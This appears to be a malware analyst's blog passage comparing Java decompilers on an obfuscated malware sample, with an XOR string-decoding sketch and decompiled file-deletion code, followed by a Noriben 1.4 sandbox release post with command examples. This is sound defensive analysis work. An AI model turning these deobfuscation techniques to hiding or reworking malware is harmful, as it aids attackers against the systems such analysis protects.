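Although FernFlower gave us the opposite of what we wanted, the routine it recovered isn't useless: it exposes the XOR key schedule (17, 93, 91, 2, 116, selected by character position modulo 5) that ZKM uses to decode the string table. A minimal Python sketch of that same logic, fed the encoded literals visible in the JAD disassembly above, recovers the strings directly:

# XOR key schedule taken from the decompiled static initializer above;
# each character is XORed with a key chosen by its position modulo 5.
KEYS = [17, 93, 91, 2, 116]

def zkm_decode(enc):
    return ''.join(chr(ord(c) ^ KEYS[i % len(KEYS)]) for i, c in enumerate(enc))

# Encoded literals as they appear in the JAD disassembly:
print(zkm_decode("B$(v\x11|\x19)k\x02t"))           # z[4] -> 'SystemDrive'
print(zkm_decode("_8>f\x071)4\"\x16t},k\x1au2,q"))  # z[0] -> 'Needs to be windows'

The output matches the plaintext values ("SystemDrive", "Needs to be windows") that JMD recovered for us automatically in the earlier decompilations.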


Test 2: Simple file deletion function.

The second test is against a very basic class file that performs one overall function: deleting a file passed to it. One notable feature of this class file is that it contains no string table. That's one less layer to work around, but it still gave some decompilers issues.

JD-GUI (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)

public class cc extends u
{
  // ERROR //
  public void b(java.lang.String paramString)
  {
    // Byte code:
    //   0: getstatic 76 c:db I
    //   3: istore 5
    //   5: invokestatic 13 s:b ()Ljava/lang/String;
    //   8: astore_2
    //   9: invokestatic 13 s:b ()Ljava/lang/String;
    //   12: astore_3
    //   13: new 6 java/io/File
    //   16: dup
    //   17: new 8 java/lang/StringBuilder
    ... Reduced for brevity ...
    //   93: athrow
    //   94: aload 4
    //   96: getstatic 9 s:h Ljava/io/DataInputStream;
    //   99: aconst_null
    //   100: invokestatic 11 g:e ()[B
    //   103: invokestatic 12 p:b (Ljava/io/File;Ljava/io/DataInputStream;Lq;[B)V
    //   106: return
    //
    // Exception table:
    //   from  to  target  type
    //   46    59  62      re
    //   53    70  73      re
    //   63    80  83      re
    //   74    90  93      re
  }
}

The first run of JD-GUI against this file produced identical results regardless of whether a deobfuscator was used. That leads to the assumption that the core obfuscation used by this malware is simply renaming functions and encoding strings. However, JD-GUI failed to decompile the code in any way, providing just basic disassembled bytecode.

Procyon (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)

import java.io.*;

public class cc extends u
{
  public void b(final String s) {
    final int db = c.db;
    final String b = s.b();
    final String b2 = s.b();
    final File file = new File(b + File.separator + b2);
    File file3 = null;
    Label_0096: {
      Label_0094: {
        try {
          final File file2 = file3 = file;
          if (db != 0) {
            break Label_0096;
          }
          if (!file2.exists()) {
            break Label_0094;
          }
        }
        catch (re re) {
          throw re;
        }
        final File file4;
        try {
          file4 = (file3 = file);
          if (db != 0) {
            break Label_0096;
          }
        }
        catch (re re2) {
          throw re2;
        }
        try {
          if (!file4.isFile()) {
            break Label_0094;
          }
        }
        catch (re re3) {
          throw re3;
        }
        try {
          file.delete();
        }
        catch (re re4) {
          throw re4;
        }
      }

      file3 = file;
    }

    p.b(file3, s.h, null, g.e());
  }
}

Procyon provides ideal output. It shows the various exception catching taking place to ensure that the file exists and is a file (not a folder or device) before calling for its deletion. The only issue is that the file object is copied into three other objects (file2, file3, file4) for exception-catching purposes. Realistically, these are all the same object.


JAD (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)


import java.io.File;

public class cc extends u
{

  public cc()
  {
  }

  public void b(String s1)
  {
    File file;
    int i;
    i = c.db;
    String s2 = s.b();
    String s3 = s.b();
    file = new File((new StringBuilder(String.valueOf(s2))).append(File.separator).append(s3).toString());
    file;
    if (i != 0) goto _L2; else goto _L1
_L1:
    exists();
    JVMINSTR ifeq 94;
    goto _L3 _L4
    throw;
_L3:
    file;
    if (i != 0) goto _L2; else goto _L5
    throw;
_L5:
    isFile();
    JVMINSTR ifeq 94;
    goto _L6 _L4
    throw;
_L6:
    file.delete();
    goto _L4
    throw;
_L4:
    file;
_L2:
    s.h;
    null;
    g.e();
    p.b();
  }
}

Here, JAD slightly disappoints. It was unable to produce decompiled code from the point of the first exception catch onward. Instead, it reverts to a mix of disassembled Java bytecode and decompiled code. However, the class is still simple enough to understand the functionality from this view, though it's nowhere near as usable as Procyon's output.


What about Krakatau?
Krakatau was mentioned earlier, but not shown here. In my experience, Krakatau provides one of the best decompilation outputs and is able to reverse a larger array of unusual code. In fact, for the first test, it is able to produce valid code for both the obfuscated routine and the string encoder. It is definitely worthy of mention and use. However, I also had many issues getting it to work correctly. It would crash on most samples I gave it, though it would still produce decompiled results. Most of this is due to minor issues: hardcoded checks for a file extension of ".jar", a hardcoded Java path of JAVA_HOME\jre\lib\rt.jar instead of the installed "jre7" path, etc. It may require small adjustments and an analytic eye to work cleanly in its current state, but it is definitely shaping up to become one of the better decompilers.

reJ (raw class file)

I can't just bring up reJ and not discuss it more in depth. reJ is my favorite Java tool for code manipulation, giving you a great deal of power over code in its compiled form. It is a Java-based disassembler and hex editor for compiled Java class files. It provides granular inspection of the bytecode, string tables, and hardcoded values. It also allows for the direct editing, deletion, and addition of new bytecode. It is only a disassembler, though, so its use requires extra knowledge of Java bytecode.

For a better analysis, I'd recommend toggling/enabling the following:
  • View -> Reference Translation -> Hybrid
  • View -> Split Mode -> Hex View
  • View -> Constant Pool

With some practice, you can work some magic on obfuscated Java code with reJ. By inserting print statements, you could have the program display all of its decoded/operational values at run time. However, this does require that you manually keep the operand stack balanced, which is not for the faint of heart.


Closing Statements

The one takeaway from all of this is that there is still no clear-cut best decompiler. Up until this year, it was a losing battle of abandoned products against ever-changing obfuscators and Java implementations. The recent introduction of Procyon, CFR, and Krakatau has brought much-needed new blood into the field. While their results are still not perfect, the hope is that within the next year or two they will surpass JD-GUI and JAD.

For now, though, analysis still requires that a reverser run multiple decompilers against a sample to determine its actual functionality. My flow has long been to run JD-GUI first, then JAD. However, I've been swayed towards Procyon, accompanied by its new GUIs, to easily churn through hundreds of classes and JAR files, making it my current first-run analysis tool. Krakatau is also in the mix, but it's not yet a tool I would hand to a junior analyst.

I'm very excited to see what will come about with these products next year when they've had a chance to mature.


Noriben version 1.4 released

It's been a few months since the last official release of Noriben. The interim time has been filled with a few ninja-edits of updated filters, and wondering what to put in next.

Noriben started out as a simple wrapper to Sysinternals procmon to automatically gather all of the runtime details for malware analysis within a VM. It then filters out all the unnecessary system details until what's left is a fairly concise view of what the malware did to the system while running. It is a great alternative to a dedicated sandbox environment. More details on Noriben can be found here.

Over the months I was ecstatic to hear of organizations using Noriben in various roles. Many had modified the script to use it as an automated sandbox to run alongside their commercial products, which was exactly one of my goals for the script. However, the current requirement of manual interaction was an issue and I saw many ugly hacks of how people bypassed it. The new version should take care of that issue.
This was originally going to be a release for version 1.3, which I pushed up on Friday. However, I received quite a bit of feedback on other new features, and so I quickly pushed up version 1.4.

In the new version 1.4, I've introduced a few new features:

  • A non-interactive mode that runs for a specified number of seconds on malware that is specified from the command line
  • The ability to generalize strings, using Windows environment variables
  • The ability to specify an output directory
Non-Interactive Mode
The non-interactive mode has been needed for a long time, and I apologize that it took this long to implement, as it was a very easy addition. It can be set in one of two ways:
The beginning of the source has a new line:

timeout_seconds = 0

By setting this to a value other than zero, Noriben will automatically monitor the system for that number of seconds and then stop. This can be hardcoded for automated implementations, such as in a sandbox environment.

This value can also be overridden with the command line option --timeout (-t). When using this argument, Noriben will enable timeout mode and use the specified number of seconds. This is useful if you have a sample with a particularly long runtime. Even if Noriben.py was modified to have a 120-second timeout, you can override this on the command line with a much greater value (3600 seconds, for example).

Noriben now also lets you specify the malware from the command line, making it completely non-interactive:

Noriben.py --cmd "C:\malware\bad.exe www.badhost.com 80" --timeout 300

This command line will launch bad.exe with the given arguments and monitor it for a period of 5 minutes. After that time, Noriben will stop monitoring the malware, though the malware itself will continue to run.

Output Directory
An alternate output directory can be specified on the command line with --output. If this folder does not exist, it will be created. If Noriben is unable to create the directory, such as when it doesn't have access (e.g. C:\Windows\System32\), then it will give an error and quit.


String Generalization
One requested feature was to replace file system paths with Windows environment variables, to make them generic. Many people copy and paste their Noriben results, which may show system-specific values such as "C:\Documents and Settings\Bob\malware.exe". This string will be generalized to "%UserProfile%\malware.exe".

This feature is turned off by default, but can be enabled by changing a setting in the file:

generalize_paths = False

Or by setting --generalize on the command line.
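The idea behind the generalization is simple: swap known environment-variable values for their names at the front of each path. A hypothetical Python sketch of that idea (not Noriben's actual code) looks like this:

import os

# Hypothetical illustration only; not Noriben's actual implementation.
# Replace system-specific path prefixes with their environment variable names.
ENV_VARS = ['UserProfile', 'AppData', 'Temp', 'WinDir', 'SystemRoot']

def generalize_path(path):
    for var in ENV_VARS:
        value = os.environ.get(var)
        if value and path.lower().startswith(value.lower()):
            return '%' + var + '%' + path[len(value):]
    return path

# 'C:\Documents and Settings\Bob\malware.exe' -> '%UserProfile%\malware.exe'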


All in all, these features could be summed up with:

Noriben.py --output C:\Logs\Malware --timeout 300 --generalize --cmd "C:\Malware\evil.exe"

Download Noriben